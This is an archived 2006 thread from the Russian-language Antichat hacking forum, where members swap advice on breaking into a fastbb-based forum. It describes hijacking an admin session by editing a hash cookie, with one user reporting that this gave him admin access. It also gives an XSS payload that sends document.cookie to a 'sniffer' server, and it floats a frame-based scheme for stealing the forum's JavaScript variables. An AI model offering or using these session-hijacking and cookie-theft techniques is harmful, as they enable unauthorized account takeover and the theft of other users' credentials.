ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
06.08.2006, 19:22
|
|
Новичок
Регистрация: 23.06.2006
Сообщений: 14
Провел на форуме:
50680
Репутация:
0
|
|
Используйте Naviscope.
Как настраивать и ссылка есть на сайте.
Вообщето он не на яваскриптах. Движок всёравно на перле.
Но жабаскриптиков там много, это да...
|
|
|
17.10.2006, 18:46
|
|
Новичок
Регистрация: 17.10.2006
Сообщений: 4
Провел на форуме:
10647
Репутация:
1
|
|
Извините, если пишу непотребщину, я в хакинге новичок.
у меня тут тоже проблема. пароль лежит в непойми-каком хэш-виде:
hи3bвофxфъp5eфде. Причем лежит он как в куках, так и в простой js переменный. Ник тоже лежит тоже в js переменной, а в куках не лежит. Хэш всегда один ( в смысле от времени не зависит), мож кто знает, что там ща за алгоритм хэширования??
Даже если добыть этот хэш админа, дальше-то что делать?
Я вот что думаю: сделать двух-фреймовую страницу, на верхнем фрейме кнопку, которая будет изменять переменные nick и parol в нижнем фрейме (это возможно ли??). В нижний - грузить форум, который надо сломать.
В общем, отзовитесь, кто его ща ломает. Поделитесь соображениями.
Кстати, в самом движке (index.pl) уязвимостей нет? Там все через этот скрипт фигачится.
|
|
|
|
17.10.2006, 20:24
|
|
Участник форума
Регистрация: 10.09.2006
Сообщений: 185
Провел на форуме:
1654589
Репутация:
337
|
|
comcon1
Если у тебя есть куки админчика, то подставь их себе и выдавай себя за него 
В опере : Инструменты - Дополнительно - Cookies. Там ищи адрес этого форума, смотри инфу которую нежно сменить. Ну там, сессию удалить, ник сменить... И хэш этот, если он в куках таковой лежит у админа, то и себе его воткни. Теперь рефрешим страницу и вуаля. |
|
|
|
17.10.2006, 21:09
|
|
Новичок
Регистрация: 17.10.2006
Сообщений: 4
Провел на форуме:
10647
Репутация:
1
|
|
нет. так не получается. апдейтом он не жрет другой хэш почему-то.
А получилось так: запустил эксплорер, зашел под tester-ом, закрыл эксплорер (сессия не умерла, куки тоже). В кук-едиторе изменил кук хэша. Открыл эксплорер, зашел на форум - сразу оказался в админе!! видимо он по кэшу юзера находит сам. хехе..
Теперь такой вопрос: если вставить ссылку на сниффер в пост и админ по ней перейдет его куки спереть удастся??
|
|
|
|
17.10.2006, 21:51
|
|
Участник форума
Регистрация: 10.09.2006
Сообщений: 185
Провел на форуме:
1654589
Репутация:
337
|
|
Если просто тупо ссылку вставить, то нет. Если ты дашь ссылку на снифер, то это уже другой сервак будет... Снифер это по сути картинка, но если ее кто-то глянул, то отдал куки. Так вот, если ты обратишься к сниферунапямую, то куков никаих не будет. А если ты найдешь метод как внедрить свою картинку в страницу, да еще и скажешь куки туда прицепить, то другое дело!
Возьмем например уязвимость ИПБ
document.cookie%3Bimg=new%20Image()%3Bimg.src=%27 НИФЕР%3F%27%2Bx/*.jpg*///.gif Видишь, ты создаешь картинку, которая шлет куки на снифер.
Чтобы куки украсть надо юзать различные XSS. Они могут быть везде... В скриптах всяких, в аватарах, в тэгах...
|
|
|
|
17.10.2006, 23:04
|
|
Новичок
Регистрация: 17.10.2006
Сообщений: 4
Провел на форуме:
10647
Репутация:
1
|
|
да. это я понял. судя по поиску, fastbb залатал бывшие в нем xss-баги совсем недавно и сейчас к нему не подступиться. мона ли, к примеру, запостить ссылку на страницу, которая в одном фрейме открывает сниффер, а в другом - этот же форум. и сниффер тырит js-переменные из форума и отправляет на другой сниффер. ???
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
